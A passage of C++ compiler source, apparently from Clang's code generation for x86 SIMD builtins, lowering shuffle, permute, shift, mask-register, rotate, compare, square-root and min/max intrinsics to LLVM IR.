Indices[l + i] = l + 4 + (Imm & 3);
Imm >>= 2;
}
}
return Builder.CreateShuffleVector(Ops[0], makeArrayRef(Indices, NumElts),
"pshufhw");
}
case X86::BI__builtin_ia32_pshufd:
case X86::BI__builtin_ia32_pshufd256:
case X86::BI__builtin_ia32_pshufd512:
case X86::BI__builtin_ia32_vpermilpd:
case X86::BI__builtin_ia32_vpermilps:
case X86::BI__builtin_ia32_vpermilpd256:
case X86::BI__builtin_ia32_vpermilps256:
case X86::BI__builtin_ia32_vpermilpd512:
case X86::BI__builtin_ia32_vpermilps512: {
uint32_t Imm = cast<llvm::ConstantInt>(Ops[1])->getZExtValue();
auto *Ty = cast<llvm::FixedVectorType>(Ops[0]->getType());
unsigned NumElts = Ty->getNumElements();
unsigned NumLanes = Ty->getPrimitiveSizeInBits() / 128;
unsigned NumLaneElts = NumElts / NumLanes;
// Splat the 8-bits of immediate 4 times to help the loop wrap around.
Imm = (Imm & 0xff) * 0x01010101;
int Indices[16];
for (unsigned l = 0; l != NumElts; l += NumLaneElts) {
for (unsigned i = 0; i != NumLaneElts; ++i) {
Indices[i + l] = (Imm % NumLaneElts) + l;
Imm /= NumLaneElts;
}
}
return Builder.CreateShuffleVector(Ops[0], makeArrayRef(Indices, NumElts),
"permil");
}
case X86::BI__builtin_ia32_shufpd:
case X86::BI__builtin_ia32_shufpd256:
case X86::BI__builtin_ia32_shufpd512:
case X86::BI__builtin_ia32_shufps:
case X86::BI__builtin_ia32_shufps256:
case X86::BI__builtin_ia32_shufps512: {
uint32_t Imm = cast<llvm::ConstantInt>(Ops[2])->getZExtValue();
auto *Ty = cast<llvm::FixedVectorType>(Ops[0]->getType());
unsigned NumElts = Ty->getNumElements();
unsigned NumLanes = Ty->getPrimitiveSizeInBits() / 128;
unsigned NumLaneElts = NumElts / NumLanes;
// Splat the 8-bits of immediate 4 times to help the loop wrap around.
Imm = (Imm & 0xff) * 0x01010101;
int Indices[16];
for (unsigned l = 0; l != NumElts; l += NumLaneElts) {
for (unsigned i = 0; i != NumLaneElts; ++i) {
unsigned Index = Imm % NumLaneElts;
Imm /= NumLaneElts;
if (i >= (NumLaneElts / 2))
Index += NumElts;
Indices[l + i] = l + Index;
}
}
return Builder.CreateShuffleVector(Ops[0], Ops[1],
makeArrayRef(Indices, NumElts),
"shufp");
}
case X86::BI__builtin_ia32_permdi256:
case X86::BI__builtin_ia32_permdf256:
case X86::BI__builtin_ia32_permdi512:
case X86::BI__builtin_ia32_permdf512: {
unsigned Imm = cast<llvm::ConstantInt>(Ops[1])->getZExtValue();
auto *Ty = cast<llvm::FixedVectorType>(Ops[0]->getType());
unsigned NumElts = Ty->getNumElements();
// These intrinsics operate on 256-bit lanes of four 64-bit elements.
int Indices[8];
for (unsigned l = 0; l != NumElts; l += 4)
for (unsigned i = 0; i != 4; ++i)
Indices[l + i] = l + ((Imm >> (2 * i)) & 0x3);
return Builder.CreateShuffleVector(Ops[0], makeArrayRef(Indices, NumElts),
"perm");
}
case X86::BI__builtin_ia32_palignr128:
case X86::BI__builtin_ia32_palignr256:
case X86::BI__builtin_ia32_palignr512: {
unsigned ShiftVal = cast<llvm::ConstantInt>(Ops[2])->getZExtValue() & 0xff;
unsigned NumElts =
cast<llvm::FixedVectorType>(Ops[0]->getType())->getNumElements();
assert(NumElts % 16 == 0);
// If palignr is shifting the pair of vectors more than the size of two
// lanes, emit zero.
if (ShiftVal >= 32)
return llvm::Constant::getNullValue(ConvertType(E->getType()));
// If palignr is shifting the pair of input vectors more than one lane,
// but less than two lanes, convert to shifting in zeroes.
if (ShiftVal > 16) {
ShiftVal -= 16;
Ops[1] = Ops[0];
Ops[0] = llvm::Constant::getNullValue(Ops[0]->getType());
}
int Indices[64];
// 256-bit palignr operates on 128-bit lanes so we need to handle that
for (unsigned l = 0; l != NumElts; l += 16) {
for (unsigned i = 0; i != 16; ++i) {
unsigned Idx = ShiftVal + i;
if (Idx >= 16)
Idx += NumElts - 16; // End of lane, switch operand.
Indices[l + i] = Idx + l;
}
}
return Builder.CreateShuffleVector(Ops[1], Ops[0],
makeArrayRef(Indices, NumElts),
"palignr");
}
case X86::BI__builtin_ia32_alignd128:
case X86::BI__builtin_ia32_alignd256:
case X86::BI__builtin_ia32_alignd512:
case X86::BI__builtin_ia32_alignq128:
case X86::BI__builtin_ia32_alignq256:
case X86::BI__builtin_ia32_alignq512: {
unsigned NumElts =
cast<llvm::FixedVectorType>(Ops[0]->getType())->getNumElements();
unsigned ShiftVal = cast<llvm::ConstantInt>(Ops[2])->getZExtValue() & 0xff;
// Mask the shift amount to width of a vector.
ShiftVal &= NumElts - 1;
int Indices[16];
for (unsigned i = 0; i != NumElts; ++i)
Indices[i] = i + ShiftVal;
return Builder.CreateShuffleVector(Ops[1], Ops[0],
makeArrayRef(Indices, NumElts),
"valign");
}
case X86::BI__builtin_ia32_shuf_f32x4_256:
case X86::BI__builtin_ia32_shuf_f64x2_256:
case X86::BI__builtin_ia32_shuf_i32x4_256:
case X86::BI__builtin_ia32_shuf_i64x2_256:
case X86::BI__builtin_ia32_shuf_f32x4:
case X86::BI__builtin_ia32_shuf_f64x2:
case X86::BI__builtin_ia32_shuf_i32x4:
case X86::BI__builtin_ia32_shuf_i64x2: {
unsigned Imm = cast<llvm::ConstantInt>(Ops[2])->getZExtValue();
auto *Ty = cast<llvm::FixedVectorType>(Ops[0]->getType());
unsigned NumElts = Ty->getNumElements();
unsigned NumLanes = Ty->getPrimitiveSizeInBits() == 512 ? 4 : 2;
unsigned NumLaneElts = NumElts / NumLanes;
int Indices[16];
for (unsigned l = 0; l != NumElts; l += NumLaneElts) {
unsigned Index = (Imm % NumLanes) * NumLaneElts;
Imm /= NumLanes; // Discard the bits we just used.
if (l >= (NumElts / 2))
Index += NumElts; // Switch to other source.
for (unsigned i = 0; i != NumLaneElts; ++i) {
Indices[l + i] = Index + i;
}
}
return Builder.CreateShuffleVector(Ops[0], Ops[1],
makeArrayRef(Indices, NumElts),
"shuf");
}
case X86::BI__builtin_ia32_vperm2f128_pd256:
case X86::BI__builtin_ia32_vperm2f128_ps256:
case X86::BI__builtin_ia32_vperm2f128_si256:
case X86::BI__builtin_ia32_permti256: {
unsigned Imm = cast<llvm::ConstantInt>(Ops[2])->getZExtValue();
unsigned NumElts =
cast<llvm::FixedVectorType>(Ops[0]->getType())->getNumElements();
// This takes a very simple approach since there are two lanes and a
// shuffle can have 2 inputs. So we reserve the first input for the first
// lane and the second input for the second lane. This may result in
// duplicate sources, but this can be dealt with in the backend.
Value *OutOps[2];
int Indices[8];
for (unsigned l = 0; l != 2; ++l) {
// Determine the source for this lane.
if (Imm & (1 << ((l * 4) + 3)))
OutOps[l] = llvm::ConstantAggregateZero::get(Ops[0]->getType());
else if (Imm & (1 << ((l * 4) + 1)))
OutOps[l] = Ops[1];
else
OutOps[l] = Ops[0];
for (unsigned i = 0; i != NumElts/2; ++i) {
// Start with ith element of the source for this lane.
unsigned Idx = (l * NumElts) + i;
// If bit 0 of the immediate half is set, switch to the high half of
// the source.
if (Imm & (1 << (l * 4)))
Idx += NumElts/2;
Indices[(l * (NumElts/2)) + i] = Idx;
}
}
return Builder.CreateShuffleVector(OutOps[0], OutOps[1],
makeArrayRef(Indices, NumElts),
"vperm");
}
case X86::BI__builtin_ia32_pslldqi128_byteshift:
case X86::BI__builtin_ia32_pslldqi256_byteshift:
case X86::BI__builtin_ia32_pslldqi512_byteshift: {
unsigned ShiftVal = cast<llvm::ConstantInt>(Ops[1])->getZExtValue() & 0xff;
auto *ResultType = cast<llvm::FixedVectorType>(Ops[0]->getType());
// Builtin type is vXi64 so multiply by 8 to get bytes.
unsigned NumElts = ResultType->getNumElements() * 8;
// If pslldq is shifting the vector more than 15 bytes, emit zero.
if (ShiftVal >= 16)
return llvm::Constant::getNullValue(ResultType);
int Indices[64];
// 256/512-bit pslldq operates on 128-bit lanes so we need to handle that
for (unsigned l = 0; l != NumElts; l += 16) {
for (unsigned i = 0; i != 16; ++i) {
unsigned Idx = NumElts + i - ShiftVal;
if (Idx < NumElts) Idx -= NumElts - 16; // end of lane, switch operand.
Indices[l + i] = Idx + l;
}
}
auto *VecTy = llvm::FixedVectorType::get(Int8Ty, NumElts);
Value *Cast = Builder.CreateBitCast(Ops[0], VecTy, "cast");
Value *Zero = llvm::Constant::getNullValue(VecTy);
Value *SV = Builder.CreateShuffleVector(Zero, Cast,
makeArrayRef(Indices, NumElts),
"pslldq");
return Builder.CreateBitCast(SV, Ops[0]->getType(), "cast");
}
case X86::BI__builtin_ia32_psrldqi128_byteshift:
case X86::BI__builtin_ia32_psrldqi256_byteshift:
case X86::BI__builtin_ia32_psrldqi512_byteshift: {
unsigned ShiftVal = cast<llvm::ConstantInt>(Ops[1])->getZExtValue() & 0xff;
auto *ResultType = cast<llvm::FixedVectorType>(Ops[0]->getType());
// Builtin type is vXi64 so multiply by 8 to get bytes.
unsigned NumElts = ResultType->getNumElements() * 8;
// If psrldq is shifting the vector more than 15 bytes, emit zero.
if (ShiftVal >= 16)
return llvm::Constant::getNullValue(ResultType);
int Indices[64];
// 256/512-bit psrldq operates on 128-bit lanes so we need to handle that
for (unsigned l = 0; l != NumElts; l += 16) {
for (unsigned i = 0; i != 16; ++i) {
unsigned Idx = i + ShiftVal;
if (Idx >= 16) Idx += NumElts - 16; // end of lane, switch operand.
Indices[l + i] = Idx + l;
}
}
auto *VecTy = llvm::FixedVectorType::get(Int8Ty, NumElts);
Value *Cast = Builder.CreateBitCast(Ops[0], VecTy, "cast");
Value *Zero = llvm::Constant::getNullValue(VecTy);
Value *SV = Builder.CreateShuffleVector(Cast, Zero,
makeArrayRef(Indices, NumElts),
"psrldq");
return Builder.CreateBitCast(SV, ResultType, "cast");
}
case X86::BI__builtin_ia32_kshiftliqi:
case X86::BI__builtin_ia32_kshiftlihi:
case X86::BI__builtin_ia32_kshiftlisi:
case X86::BI__builtin_ia32_kshiftlidi: {
unsigned ShiftVal = cast<llvm::ConstantInt>(Ops[1])->getZExtValue() & 0xff;
unsigned NumElts = Ops[0]->getType()->getIntegerBitWidth();
if (ShiftVal >= NumElts)
return llvm::Constant::getNullValue(Ops[0]->getType());
Value *In = getMaskVecValue(*this, Ops[0], NumElts);
int Indices[64];
for (unsigned i = 0; i != NumElts; ++i)
Indices[i] = NumElts + i - ShiftVal;
Value *Zero = llvm::Constant::getNullValue(In->getType());
Value *SV = Builder.CreateShuffleVector(Zero, In,
makeArrayRef(Indices, NumElts),
"kshiftl");
return Builder.CreateBitCast(SV, Ops[0]->getType());
}
case X86::BI__builtin_ia32_kshiftriqi:
case X86::BI__builtin_ia32_kshiftrihi:
case X86::BI__builtin_ia32_kshiftrisi:
case X86::BI__builtin_ia32_kshiftridi: {
unsigned ShiftVal = cast<llvm::ConstantInt>(Ops[1])->getZExtValue() & 0xff;
unsigned NumElts = Ops[0]->getType()->getIntegerBitWidth();
if (ShiftVal >= NumElts)
return llvm::Constant::getNullValue(Ops[0]->getType());
Value *In = getMaskVecValue(*this, Ops[0], NumElts);
int Indices[64];
for (unsigned i = 0; i != NumElts; ++i)
Indices[i] = i + ShiftVal;
Value *Zero = llvm::Constant::getNullValue(In->getType());
Value *SV = Builder.CreateShuffleVector(In, Zero,
makeArrayRef(Indices, NumElts),
"kshiftr");
return Builder.CreateBitCast(SV, Ops[0]->getType());
}
case X86::BI__builtin_ia32_movnti:
case X86::BI__builtin_ia32_movnti64:
case X86::BI__builtin_ia32_movntsd:
case X86::BI__builtin_ia32_movntss: {
llvm::MDNode *Node = llvm::MDNode::get(
getLLVMContext(), llvm::ConstantAsMetadata::get(Builder.getInt32(1)));
Value *Ptr = Ops[0];
Value *Src = Ops[1];
// Extract the 0'th element of the source vector.
if (BuiltinID == X86::BI__builtin_ia32_movntsd ||
BuiltinID == X86::BI__builtin_ia32_movntss)
Src = Builder.CreateExtractElement(Src, (uint64_t)0, "extract");
// Convert the type of the pointer to a pointer to the stored type.
Value *BC = Builder.CreateBitCast(
Ptr, llvm::PointerType::getUnqual(Src->getType()), "cast");
// Unaligned nontemporal store of the scalar value.
StoreInst *SI = Builder.CreateDefaultAlignedStore(Src, BC);
SI->setMetadata(CGM.getModule().getMDKindID("nontemporal"), Node);
SI->setAlignment(llvm::Align(1));
return SI;
}
// Rotate is a special case of funnel shift - 1st 2 args are the same.
case X86::BI__builtin_ia32_vprotb:
case X86::BI__builtin_ia32_vprotw:
case X86::BI__builtin_ia32_vprotd:
case X86::BI__builtin_ia32_vprotq:
case X86::BI__builtin_ia32_vprotbi:
case X86::BI__builtin_ia32_vprotwi:
case X86::BI__builtin_ia32_vprotdi:
case X86::BI__builtin_ia32_vprotqi:
case X86::BI__builtin_ia32_prold128:
case X86::BI__builtin_ia32_prold256:
case X86::BI__builtin_ia32_prold512:
case X86::BI__builtin_ia32_prolq128:
case X86::BI__builtin_ia32_prolq256:
case X86::BI__builtin_ia32_prolq512:
case X86::BI__builtin_ia32_prolvd128:
case X86::BI__builtin_ia32_prolvd256:
case X86::BI__builtin_ia32_prolvd512:
case X86::BI__builtin_ia32_prolvq128:
case X86::BI__builtin_ia32_prolvq256:
case X86::BI__builtin_ia32_prolvq512:
return EmitX86FunnelShift(*this, Ops[0], Ops[0], Ops[1], false);
case X86::BI__builtin_ia32_prord128:
case X86::BI__builtin_ia32_prord256:
case X86::BI__builtin_ia32_prord512:
case X86::BI__builtin_ia32_prorq128:
case X86::BI__builtin_ia32_prorq256:
case X86::BI__builtin_ia32_prorq512:
case X86::BI__builtin_ia32_prorvd128:
case X86::BI__builtin_ia32_prorvd256:
case X86::BI__builtin_ia32_prorvd512:
case X86::BI__builtin_ia32_prorvq128:
case X86::BI__builtin_ia32_prorvq256:
case X86::BI__builtin_ia32_prorvq512:
return EmitX86FunnelShift(*this, Ops[0], Ops[0], Ops[1], true);
case X86::BI__builtin_ia32_selectb_128:
case X86::BI__builtin_ia32_selectb_256:
case X86::BI__builtin_ia32_selectb_512:
case X86::BI__builtin_ia32_selectw_128:
case X86::BI__builtin_ia32_selectw_256:
case X86::BI__builtin_ia32_selectw_512:
case X86::BI__builtin_ia32_selectd_128:
case X86::BI__builtin_ia32_selectd_256:
case X86::BI__builtin_ia32_selectd_512:
case X86::BI__builtin_ia32_selectq_128:
case X86::BI__builtin_ia32_selectq_256:
case X86::BI__builtin_ia32_selectq_512:
case X86::BI__builtin_ia32_selectph_128:
case X86::BI__builtin_ia32_selectph_256:
case X86::BI__builtin_ia32_selectph_512:
case X86::BI__builtin_ia32_selectps_128:
case X86::BI__builtin_ia32_selectps_256:
case X86::BI__builtin_ia32_selectps_512:
case X86::BI__builtin_ia32_selectpd_128:
case X86::BI__builtin_ia32_selectpd_256:
case X86::BI__builtin_ia32_selectpd_512:
return EmitX86Select(*this, Ops[0], Ops[1], Ops[2]);
case X86::BI__builtin_ia32_selectsh_128:
case X86::BI__builtin_ia32_selectss_128:
case X86::BI__builtin_ia32_selectsd_128: {
Value *A = Builder.CreateExtractElement(Ops[1], (uint64_t)0);
Value *B = Builder.CreateExtractElement(Ops[2], (uint64_t)0);
A = EmitX86ScalarSelect(*this, Ops[0], A, B);
return Builder.CreateInsertElement(Ops[1], A, (uint64_t)0);
}
case X86::BI__builtin_ia32_cmpb128_mask:
case X86::BI__builtin_ia32_cmpb256_mask:
case X86::BI__builtin_ia32_cmpb512_mask:
case X86::BI__builtin_ia32_cmpw128_mask:
case X86::BI__builtin_ia32_cmpw256_mask:
case X86::BI__builtin_ia32_cmpw512_mask:
case X86::BI__builtin_ia32_cmpd128_mask:
case X86::BI__builtin_ia32_cmpd256_mask:
case X86::BI__builtin_ia32_cmpd512_mask:
case X86::BI__builtin_ia32_cmpq128_mask:
case X86::BI__builtin_ia32_cmpq256_mask:
case X86::BI__builtin_ia32_cmpq512_mask: {
unsigned CC = cast<llvm::ConstantInt>(Ops[2])->getZExtValue() & 0x7;
return EmitX86MaskedCompare(*this, CC, true, Ops);
}
case X86::BI__builtin_ia32_ucmpb128_mask:
case X86::BI__builtin_ia32_ucmpb256_mask:
case X86::BI__builtin_ia32_ucmpb512_mask:
case X86::BI__builtin_ia32_ucmpw128_mask:
case X86::BI__builtin_ia32_ucmpw256_mask:
case X86::BI__builtin_ia32_ucmpw512_mask:
case X86::BI__builtin_ia32_ucmpd128_mask:
case X86::BI__builtin_ia32_ucmpd256_mask:
case X86::BI__builtin_ia32_ucmpd512_mask:
case X86::BI__builtin_ia32_ucmpq128_mask:
case X86::BI__builtin_ia32_ucmpq256_mask:
case X86::BI__builtin_ia32_ucmpq512_mask: {
unsigned CC = cast<llvm::ConstantInt>(Ops[2])->getZExtValue() & 0x7;
return EmitX86MaskedCompare(*this, CC, false, Ops);
}
case X86::BI__builtin_ia32_vpcomb:
case X86::BI__builtin_ia32_vpcomw:
case X86::BI__builtin_ia32_vpcomd:
case X86::BI__builtin_ia32_vpcomq:
return EmitX86vpcom(*this, Ops, true);
case X86::BI__builtin_ia32_vpcomub:
case X86::BI__builtin_ia32_vpcomuw:
case X86::BI__builtin_ia32_vpcomud:
case X86::BI__builtin_ia32_vpcomuq:
return EmitX86vpcom(*this, Ops, false);
case X86::BI__builtin_ia32_kortestcqi:
case X86::BI__builtin_ia32_kortestchi:
case X86::BI__builtin_ia32_kortestcsi:
case X86::BI__builtin_ia32_kortestcdi: {
Value *Or = EmitX86MaskLogic(*this, Instruction::Or, Ops);
Value *C = llvm::Constant::getAllOnesValue(Ops[0]->getType());
Value *Cmp = Builder.CreateICmpEQ(Or, C);
return Builder.CreateZExt(Cmp, ConvertType(E->getType()));
}
case X86::BI__builtin_ia32_kortestzqi:
case X86::BI__builtin_ia32_kortestzhi:
case X86::BI__builtin_ia32_kortestzsi:
case X86::BI__builtin_ia32_kortestzdi: {
Value *Or = EmitX86MaskLogic(*this, Instruction::Or, Ops);
Value *C = llvm::Constant::getNullValue(Ops[0]->getType());
Value *Cmp = Builder.CreateICmpEQ(Or, C);
return Builder.CreateZExt(Cmp, ConvertType(E->getType()));
}
case X86::BI__builtin_ia32_ktestcqi:
case X86::BI__builtin_ia32_ktestzqi:
case X86::BI__builtin_ia32_ktestchi:
case X86::BI__builtin_ia32_ktestzhi:
case X86::BI__builtin_ia32_ktestcsi:
case X86::BI__builtin_ia32_ktestzsi:
case X86::BI__builtin_ia32_ktestcdi:
case X86::BI__builtin_ia32_ktestzdi: {
Intrinsic::ID IID;
switch (BuiltinID) {
default: llvm_unreachable("Unsupported intrinsic!");
case X86::BI__builtin_ia32_ktestcqi:
IID = Intrinsic::x86_avx512_ktestc_b;
break;
case X86::BI__builtin_ia32_ktestzqi:
IID = Intrinsic::x86_avx512_ktestz_b;
break;
case X86::BI__builtin_ia32_ktestchi:
IID = Intrinsic::x86_avx512_ktestc_w;
break;
case X86::BI__builtin_ia32_ktestzhi:
IID = Intrinsic::x86_avx512_ktestz_w;
break;
case X86::BI__builtin_ia32_ktestcsi:
IID = Intrinsic::x86_avx512_ktestc_d;
break;
case X86::BI__builtin_ia32_ktestzsi:
IID = Intrinsic::x86_avx512_ktestz_d;
break;
case X86::BI__builtin_ia32_ktestcdi:
IID = Intrinsic::x86_avx512_ktestc_q;
break;
case X86::BI__builtin_ia32_ktestzdi:
IID = Intrinsic::x86_avx512_ktestz_q;
break;
}
unsigned NumElts = Ops[0]->getType()->getIntegerBitWidth();
Value *LHS = getMaskVecValue(*this, Ops[0], NumElts);
Value *RHS = getMaskVecValue(*this, Ops[1], NumElts);
Function *Intr = CGM.getIntrinsic(IID);
return Builder.CreateCall(Intr, {LHS, RHS});
}
case X86::BI__builtin_ia32_kaddqi:
case X86::BI__builtin_ia32_kaddhi:
case X86::BI__builtin_ia32_kaddsi:
case X86::BI__builtin_ia32_kadddi: {
Intrinsic::ID IID;
switch (BuiltinID) {
default: llvm_unreachable("Unsupported intrinsic!");
case X86::BI__builtin_ia32_kaddqi:
IID = Intrinsic::x86_avx512_kadd_b;
break;
case X86::BI__builtin_ia32_kaddhi:
IID = Intrinsic::x86_avx512_kadd_w;
break;
case X86::BI__builtin_ia32_kaddsi:
IID = Intrinsic::x86_avx512_kadd_d;
break;
case X86::BI__builtin_ia32_kadddi:
IID = Intrinsic::x86_avx512_kadd_q;
break;
}
unsigned NumElts = Ops[0]->getType()->getIntegerBitWidth();
Value *LHS = getMaskVecValue(*this, Ops[0], NumElts);
Value *RHS = getMaskVecValue(*this, Ops[1], NumElts);
Function *Intr = CGM.getIntrinsic(IID);
Value *Res = Builder.CreateCall(Intr, {LHS, RHS});
return Builder.CreateBitCast(Res, Ops[0]->getType());
}
case X86::BI__builtin_ia32_kandqi:
case X86::BI__builtin_ia32_kandhi:
case X86::BI__builtin_ia32_kandsi:
case X86::BI__builtin_ia32_kanddi:
return EmitX86MaskLogic(*this, Instruction::And, Ops);
case X86::BI__builtin_ia32_kandnqi:
case X86::BI__builtin_ia32_kandnhi:
case X86::BI__builtin_ia32_kandnsi:
case X86::BI__builtin_ia32_kandndi:
return EmitX86MaskLogic(*this, Instruction::And, Ops, true);
case X86::BI__builtin_ia32_korqi:
case X86::BI__builtin_ia32_korhi:
case X86::BI__builtin_ia32_korsi:
case X86::BI__builtin_ia32_kordi:
return EmitX86MaskLogic(*this, Instruction::Or, Ops);
case X86::BI__builtin_ia32_kxnorqi:
case X86::BI__builtin_ia32_kxnorhi:
case X86::BI__builtin_ia32_kxnorsi:
case X86::BI__builtin_ia32_kxnordi:
return EmitX86MaskLogic(*this, Instruction::Xor, Ops, true);
case X86::BI__builtin_ia32_kxorqi:
case X86::BI__builtin_ia32_kxorhi:
case X86::BI__builtin_ia32_kxorsi:
case X86::BI__builtin_ia32_kxordi:
return EmitX86MaskLogic(*this, Instruction::Xor, Ops);
case X86::BI__builtin_ia32_knotqi:
case X86::BI__builtin_ia32_knothi:
case X86::BI__builtin_ia32_knotsi:
case X86::BI__builtin_ia32_knotdi: {
unsigned NumElts = Ops[0]->getType()->getIntegerBitWidth();
Value *Res = getMaskVecValue(*this, Ops[0], NumElts);
return Builder.CreateBitCast(Builder.CreateNot(Res),
Ops[0]->getType());
}
case X86::BI__builtin_ia32_kmovb:
case X86::BI__builtin_ia32_kmovw:
case X86::BI__builtin_ia32_kmovd:
case X86::BI__builtin_ia32_kmovq: {
// Bitcast to vXi1 type and then back to integer. This gets the mask
// register type into the IR, but might be optimized out depending on
// what's around it.
unsigned NumElts = Ops[0]->getType()->getIntegerBitWidth();
Value *Res = getMaskVecValue(*this, Ops[0], NumElts);
return Builder.CreateBitCast(Res, Ops[0]->getType());
}
case X86::BI__builtin_ia32_kunpckdi:
case X86::BI__builtin_ia32_kunpcksi:
case X86::BI__builtin_ia32_kunpckhi: {
unsigned NumElts = Ops[0]->getType()->getIntegerBitWidth();
Value *LHS = getMaskVecValue(*this, Ops[0], NumElts);
Value *RHS = getMaskVecValue(*this, Ops[1], NumElts);
int Indices[64];
for (unsigned i = 0; i != NumElts; ++i)
Indices[i] = i;
// First extract half of each vector. This gives better codegen than
// doing it in a single shuffle.
LHS = Builder.CreateShuffleVector(LHS, LHS,
makeArrayRef(Indices, NumElts / 2));
RHS = Builder.CreateShuffleVector(RHS, RHS,
makeArrayRef(Indices, NumElts / 2));
// Concat the vectors.
// NOTE: Operands are swapped to match the intrinsic definition.
Value *Res = Builder.CreateShuffleVector(RHS, LHS,
makeArrayRef(Indices, NumElts));
return Builder.CreateBitCast(Res, Ops[0]->getType());
}
case X86::BI__builtin_ia32_vplzcntd_128:
case X86::BI__builtin_ia32_vplzcntd_256:
case X86::BI__builtin_ia32_vplzcntd_512:
case X86::BI__builtin_ia32_vplzcntq_128:
case X86::BI__builtin_ia32_vplzcntq_256:
case X86::BI__builtin_ia32_vplzcntq_512: {
Function *F = CGM.getIntrinsic(Intrinsic::ctlz, Ops[0]->getType());
return Builder.CreateCall(F, {Ops[0],Builder.getInt1(false)});
}
case X86::BI__builtin_ia32_sqrtss:
case X86::BI__builtin_ia32_sqrtsd: {
Value *A = Builder.CreateExtractElement(Ops[0], (uint64_t)0);
Function *F;
if (Builder.getIsFPConstrained()) {
CodeGenFunction::CGFPOptionsRAII FPOptsRAII(*this, E);
F = CGM.getIntrinsic(Intrinsic::experimental_constrained_sqrt,
A->getType());
A = Builder.CreateConstrainedFPCall(F, {A});
} else {
F = CGM.getIntrinsic(Intrinsic::sqrt, A->getType());
A = Builder.CreateCall(F, {A});
}
return Builder.CreateInsertElement(Ops[0], A, (uint64_t)0);
}
case X86::BI__builtin_ia32_sqrtsh_round_mask:
case X86::BI__builtin_ia32_sqrtsd_round_mask:
case X86::BI__builtin_ia32_sqrtss_round_mask: {
unsigned CC = cast<llvm::ConstantInt>(Ops[4])->getZExtValue();
// Support only if the rounding mode is 4 (AKA CUR_DIRECTION),
// otherwise keep the intrinsic.
if (CC != 4) {
Intrinsic::ID IID;
switch (BuiltinID) {
default:
llvm_unreachable("Unsupported intrinsic!");
case X86::BI__builtin_ia32_sqrtsh_round_mask:
IID = Intrinsic::x86_avx512fp16_mask_sqrt_sh;
break;
case X86::BI__builtin_ia32_sqrtsd_round_mask:
IID = Intrinsic::x86_avx512_mask_sqrt_sd;
break;
case X86::BI__builtin_ia32_sqrtss_round_mask:
IID = Intrinsic::x86_avx512_mask_sqrt_ss;
break;
}
return Builder.CreateCall(CGM.getIntrinsic(IID), Ops);
}
Value *A = Builder.CreateExtractElement(Ops[1], (uint64_t)0);
Function *F;
if (Builder.getIsFPConstrained()) {
CodeGenFunction::CGFPOptionsRAII FPOptsRAII(*this, E);
F = CGM.getIntrinsic(Intrinsic::experimental_constrained_sqrt,
A->getType());
A = Builder.CreateConstrainedFPCall(F, A);
} else {
F = CGM.getIntrinsic(Intrinsic::sqrt, A->getType());
A = Builder.CreateCall(F, A);
}
Value *Src = Builder.CreateExtractElement(Ops[2], (uint64_t)0);
A = EmitX86ScalarSelect(*this, Ops[3], A, Src);
return Builder.CreateInsertElement(Ops[0], A, (uint64_t)0);
}
case X86::BI__builtin_ia32_sqrtpd256:
case X86::BI__builtin_ia32_sqrtpd:
case X86::BI__builtin_ia32_sqrtps256:
case X86::BI__builtin_ia32_sqrtps:
case X86::BI__builtin_ia32_sqrtph256:
case X86::BI__builtin_ia32_sqrtph:
case X86::BI__builtin_ia32_sqrtph512:
case X86::BI__builtin_ia32_sqrtps512:
case X86::BI__builtin_ia32_sqrtpd512: {
if (Ops.size() == 2) {
unsigned CC = cast<llvm::ConstantInt>(Ops[1])->getZExtValue();
// Support only if the rounding mode is 4 (AKA CUR_DIRECTION),
// otherwise keep the intrinsic.
if (CC != 4) {
Intrinsic::ID IID;
switch (BuiltinID) {
default:
llvm_unreachable("Unsupported intrinsic!");
case X86::BI__builtin_ia32_sqrtph512:
IID = Intrinsic::x86_avx512fp16_sqrt_ph_512;
break;
case X86::BI__builtin_ia32_sqrtps512:
IID = Intrinsic::x86_avx512_sqrt_ps_512;
break;
case X86::BI__builtin_ia32_sqrtpd512:
IID = Intrinsic::x86_avx512_sqrt_pd_512;
break;
}
return Builder.CreateCall(CGM.getIntrinsic(IID), Ops);
}
}
if (Builder.getIsFPConstrained()) {
CodeGenFunction::CGFPOptionsRAII FPOptsRAII(*this, E);
Function *F = CGM.getIntrinsic(Intrinsic::experimental_constrained_sqrt,
Ops[0]->getType());
return Builder.CreateConstrainedFPCall(F, Ops[0]);
} else {
Function *F = CGM.getIntrinsic(Intrinsic::sqrt, Ops[0]->getType());
return Builder.CreateCall(F, Ops[0]);
}
}
case X86::BI__builtin_ia32_pabsb128:
case X86::BI__builtin_ia32_pabsw128:
case X86::BI__builtin_ia32_pabsd128:
case X86::BI__builtin_ia32_pabsb256:
case X86::BI__builtin_ia32_pabsw256:
case X86::BI__builtin_ia32_pabsd256:
case X86::BI__builtin_ia32_pabsq128:
case X86::BI__builtin_ia32_pabsq256:
case X86::BI__builtin_ia32_pabsb512:
case X86::BI__builtin_ia32_pabsw512:
case X86::BI__builtin_ia32_pabsd512:
case X86::BI__builtin_ia32_pabsq512: {
Function *F = CGM.getIntrinsic(Intrinsic::abs, Ops[0]->getType());
return Builder.CreateCall(F, {Ops[0], Builder.getInt1(false)});
}
case X86::BI__builtin_ia32_pmaxsb128:
case X86::BI__builtin_ia32_pmaxsw128:
case X86::BI__builtin_ia32_pmaxsd128:
case X86::BI__builtin_ia32_pmaxsq128:
case X86::BI__builtin_ia32_pmaxsb256:
case X86::BI__builtin_ia32_pmaxsw256:
case X86::BI__builtin_ia32_pmaxsd256:
case X86::BI__builtin_ia32_pmaxsq256:
case X86::BI__builtin_ia32_pmaxsb512:
case X86::BI__builtin_ia32_pmaxsw512:
case X86::BI__builtin_ia32_pmaxsd512:
case X86::BI__builtin_ia32_pmaxsq512:
return EmitX86BinaryIntrinsic(*this, Ops, Intrinsic::smax);
case X86::BI__builtin_ia32_pmaxub128:
case X86::BI__builtin_ia32_pmaxuw128:
case X86::BI__builtin_ia32_pmaxud128:
case X86::BI__builtin_ia32_pmaxuq128:
case X86::BI__builtin_ia32_pmaxub256:
case X86::BI__builtin_ia32_pmaxuw256:
case X86::BI__builtin_ia32_pmaxud256:
case X86::BI__builtin_ia32_pmaxuq256:
case X86::BI__builtin_ia32_pmaxub512:
case X86::BI__builtin_ia32_pmaxuw512:
case X86::BI__builtin_ia32_pmaxud512:
case X86::BI__builtin_ia32_pmaxuq512:
return EmitX86BinaryIntrinsic(*this, Ops, Intrinsic::umax);
case X86::BI__builtin_ia32_pminsb128:
case X86::BI__builtin_ia32_pminsw128:
case X86::BI__builtin_ia32_pminsd128:
case X86::BI__builtin_ia32_pminsq128:
case X86::BI__builtin_ia32_pminsb256:
case X86::BI__builtin_ia32_pminsw256:
